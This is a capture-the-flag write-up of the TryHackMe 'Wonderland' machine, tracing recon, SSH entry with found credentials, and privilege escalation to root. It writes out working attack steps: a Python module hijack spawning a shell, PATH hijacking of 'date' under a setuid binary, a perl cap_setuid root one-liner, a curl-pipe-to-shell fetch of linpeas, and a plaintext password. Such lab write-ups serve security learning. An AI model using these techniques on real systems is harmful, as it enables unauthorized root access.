---
title: Wonderland TryHackMe WriteUp
date: 2022-01-21T21:14:17-05:00
draft: false
lastmod: 2022-07-09T02:09:21.817Z
---

# Wonderland THM Write-Up

- Table of Contents
	- [Getting Ready](#Getting-Ready)
	- [Information Gathering](#information-gathering)
	- [Privilege Escalation](#privilege-escalation)
		- [Getting Rabbit](#gaining-rabbit)
		- [Getting Hatter](#gaining-hatter)
		- [Getting Root](#gaining-root)

## Getting Ready
Everytime I start a new box, I set the target IP address to bash variable `$ip`.
`export ip=10.10.100.87`

I do this so even if the `ip` changes throughout the write-up, it still makes sense. I verify that `$ip` has been correctly set:`echo $ip`

## Information Gathering
First things first, start off the scans that may take awhile. For this box I kicked off `rustscan -a $ip --ulimit 5000` and `autorecon $ip`. While those were running, I took the IP and pasted it into my browser, finding an HTTP server.

From there, I decided to kick off a `gobuster dir -u $ip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt` scan. 

While that was going, I went back to the terminal window that had my `rustscan` ready.
```
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.100.87:22
Open 10.10.100.87:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")                                                
                                                                                                         
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-02 17:14 EST                                      
Initiating Ping Scan at 17:14
Scanning 10.10.100.87 [2 ports]
Completed Ping Scan at 17:14, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:14
Completed Parallel DNS resolution of 1 host. at 17:14, 5.54s elapsed
DNS resolution of 1 IPs took 5.54s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 17:14
Scanning 10.10.100.87 [2 ports]
Discovered open port 22/tcp on 10.10.100.87
Discovered open port 80/tcp on 10.10.100.87
Completed Connect Scan at 17:14, 0.11s elapsed (2 total ports)
Nmap scan report for 10.10.100.87
Host is up, received syn-ack (0.19s latency).
Scanned at 2022-01-02 17:14:38 EST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds
```
As expected, `port 80` is open, but `port 22` for `ssh` is also open. It crossed my mind to kick off a bruteforce attack against the ssh port, but decided to hold off until my `gobuster` scan was complete. Im glad I did, because it revealed quite a few interesting things.

For one, we have a directory path that is as follows: `$ip/r/a/b/b/i/t/`.

Going through each one gives you some exposition from Alice in Wonderland:
`$ip/`: "Follow the White Rabbit. "Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)"
`$ip/r/`: "Would you tell me, please, which way I ought to go from here?"
`$ip/r/a/`: "That depends a good deal on where you want to get to," said the Cat.
`$ip/r/a/b/`: "I don’t much care where—" said Alice.
`$ip/r/a/b/b/`: "Then it doesn’t matter which way you go," said the Cat.
`$ip/r/a/b/b/i/`: "—so long as I get somewhere,"" Alice added as an explanation.
`$ip/r/a/b/b/i/t`: Open the door and enter wonderland.

"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."

Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"

"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving the other paw, "lives a March Hare. Visit either you like: they’re both mad."

At this point, there were no more directories to go through, so I decided to `Inspect` page. 
```html
<!DOCTYPE html>

<head>
    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:[REDACTED]</p>
    <img src="/img/alice_door.png" style="height: 50rem;">
</body>
```

Curiously, I go through each tag until I find: `alice:[REDACTED]`

These look like credentials to me. I tried `ssh alice@$ip` with the possible password and it worked. I was now in Wonderland.

Once I entered Wonderland, I tried an `ls -lah`:
```bash
alice@wonderland:~$ ls -lah
total 40K
drwxr-xr-x 5 alice alice 4.0K May 25  2020 .
drwxr-xr-x 6 root  root  4.0K May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3.7K May 25  2020 .bashrc
drwx------ 2 alice alice 4.0K May 25  2020 .cache
drwx------ 3 alice alice 4.0K May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4.0K May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3.5K May 25  2020 walrus_and_the_carpenter.py
```
Strangely, we find the `root.txt` flag in here. I tried a simple `cat root.txt`, but of course it failed. This wasn't going to be that easy. However, noticing `root.txt` here gave me the idea `user.txt` may be in `/root`. 

A quick `cat /root/user.txt` revealed it was in there! We have the first flag!

After finding `user.txt`, I moved onto `walrus_and_the_carpenter.py`:
```python
#walrus_and_the_carpenter.py
import random

poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```

## Privilege Escalation 
### Gaining Rabbit
I noticed the script imports the `random.py` library, has `poem` as a string, and randomly chooses which part of the poem to output. Looking back at the permissions, I noticed I couldnt run change it as `alice`, so I tried to list my sudo permissions using `sudo -l`:
```bash
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

```

Although I couldn't change the script as `alice`, I *can* run the script as `rabbit`. Looks like we're on the right track.

I went back over the script to see what I could change, and realized I could library hijack  `import random`!

If a directory holding the python modules is world writable or python looks in my local directory for a library module, I could either change random or have it import arbitrary code to spawn a `pty shell`.

For this box, I needed to `alias python="python3"`, as it couldn't find `python`. Using the alias, I enumerated over the directories `python` looks for modules: `python -c 'import sys; print("\n".join(sys.path))'`
```bash
alice@wonderland:~$ python -c 'import sys; print("\n".join(sys.path))'

/usr/lib/python36.zip
/usr/lib/python3.6
/usr/lib/python3.6/lib-dynload
/usr/local/lib/python3.6/dist-packages
/usr/lib/python3/dist-packages
```

Bingo! We have a `/usr/local/lib/python3.6/dist-packages`. Python *is* looking in our directory for a module if we made one. **Note**: I did check the other directories, but `random` was not world writeable.

Using `vim random.py`, I create a dummy module for the script to load. The script imports `pty` and spawns a `bash` shell.
```python
import pty

pty.spawn("/bin/bash")
```


Running `sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py`, I was able to get a `bash` shell as `rabbit`!
```bash
rabbit@wonderland:~$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
```

### Gaining Hatter
Now that we are `rabbit`, we need to see what's in `/home/rabbit`. After changing directories into `/home/rabbit`, another `ls -lah` shows us a binary called `teaParty`.
```bash
rabbit@wonderland:/home/rabbit$ ls -lah
total 40K
drwxr-x--- 2 rabbit rabbit 4.0K May 25  2020 .
drwxr-xr-x 6 root   root   4.0K May 25  2020 ..
lrwxrwxrwx 1 root   root      9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit  220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3.7K May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit  807 May 25  2020 .profile
-rwsr-sr-x 1 root   root    17K May 25  2020 teaParty
```

Immediately I noticed the interesting permissions on `teaParty`. I knew `-rwsr-sr-x` meant it had a `setuid` bit, so it would run as root everytime we ran it.

 When I ran `./teaParty`, I noticed the output gave me some more "Alice in Wonderland" exposition and a detailed date/time.
 ```bash
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Mon, 03 Jan 2022 00:38:15 +0000
Ask very nicely, and I will give you some tea while you wait for him
Please
Segmentation fault (core dumped)
```
 
 The binary waited for my input. I entered `please` and it immediately threw a `Segmentation fault (core dumped)` error (rude). At this point, the segfault threw me for a loop. I believed I could exploit it using an overflow, maybe some Return Oriented Programming (ROP), but I was overthinking it. 

 I came to the conclusion the solution could be like the python library hijacking I did. This is where that detailed date/time came in.

 Using the power of `find / -name date 2>/dev/null`, I located `/bin/date`.
 ```bash
rabbit@wonderland:/home/rabbit$ find / -name date 2>/dev/null
/sys/devices/pnp0/00:02/rtc/rtc0/date
/usr/lib/byobu/date
/bin/date
 ```

Similar to escalating from `alice`, I hijacked `date` by making a `/tmp/date` and setting it to be executable `chmod +x /tmp/date`:
```bash
#!/bin/bash

/bin/bash
```

and changed the `$PATH` variable to call `/tmp` before `/bin`.
```bash
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
```

I ran `./teaParty` again and this time found myself as `hatter`.

```bash
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
```

### Gaining Root
Now that we have moved to `hatter`, I jumped to our new home directory. Again, our good ol' trust `ls -lah` revealed a `password.txt`. 

```bash
total 28K
drwxr-x--- 3 hatter hatter 4.0K May 25  2020 .
drwxr-xr-x 6 root   root   4.0K May 25  2020 ..
lrwxrwxrwx 1 root   root      9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter  220 May 25  2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3.7K May 25  2020 .bashrc
drwxrwxr-x 3 hatter hatter 4.0K May 25  2020 .local
-rw-r--r-- 1 hatter hatter  807 May 25  2020 .profile
-rw------- 1 hatter hatter   29 May 25  2020 password.txt
```

I did find we could use the password ssh (`ssh hatter@$ip`) into Wonderland, but when I tried to `sudo` with it, I found `hatter` had no `sudo` permissions. 
```bash
hatter@wonderland:/home/hatter$ sudo -i
[sudo] password for hatter: 
hatter is not in the sudoers file.  This incident will be reported.
```
`WhyIsARavenLikeAWritingDesk?`

I began hunting for vectors I could possibly get a root shell with. Given we had seen a `setuid` bit earlier, I figured I could probably find another.
`find / -xdev -perm -4000 2>/dev/null`
```bash
hatter@wonderland:/home/hatter$ find / -xdev -perm -4000 2>/dev/null
/home/rabbit/teaParty
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/bin/fusermount
/bin/umount
/bin/ping
/bin/mount
/bin/su
```

This gave me a list of `setuid` executables I could possibly exploit. I went searching around for the most common ones and found a [blog talking about them](https://pentestlab.blog/2017/09/25/suid-executables/). My options were: 

-   Nmap
-   Vim
-   find
-   Bash
-   More
-   Less
-   Nano
-   cp

I gave each a try, but none of them worked. 

I searched around more until I came across a script to search for possible Linux privilege escalation vectors, [`linenum.sh`](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh). I copied this into the target box and set it executable. After running it, there was a *ton* of output, but what caught my eye immediately was the Linux kernel version:
```bash
hatter@wonderland:~$ ./linenum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Mon Jan  3 01:40:09 UTC 2022


### SYSTEM ##############################################
[-] Kernel information:
Linux wonderland 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-101-generic (buildd@lgw01-amd64-003) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020

```

After searching around for an exploit on Linux version `4.15.0-101-generic` , I found the [polkit method](https://www.exploit-db.com/exploits/47167), but sadly I soon found out `gcc` also did not exist on the box, so we couldnt use the `polkit method`.

While searching, I happened upon this really cool [Linux Privilege Escalation Checklist](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist) and right up top was a recommendation for script called [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) .

 I couldn't curl it straight from Github, so I downloaded it to my local machine and setup a `python -m http.server 80` in the file's directory. 

From there, I was able to `curl $local_machine/linpeas.sh | sh` to run it on the target. At the beginning of it's output, it gives the following legend:
```bash
LEGEND:                                                                                                 
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

```

`linpeas.sh` revealed `perl` has a 95% chance of being a privilege escalation vector (PEV):
```bash
Files with capabilities (limited to 50):
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```

Using some google-fu, I searched `perl capabilities privilege escalation` and found a [cool blog explainaing how to perl privesc by rangeforce](https://materials.rangeforce.com/tutorial/2020/02/19/Linux-PrivEsc-Capabilities/). 

Using the provided command `perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'`, we finally had `root`:
```bash
hatter@wonderland:~$ perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:~# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
```



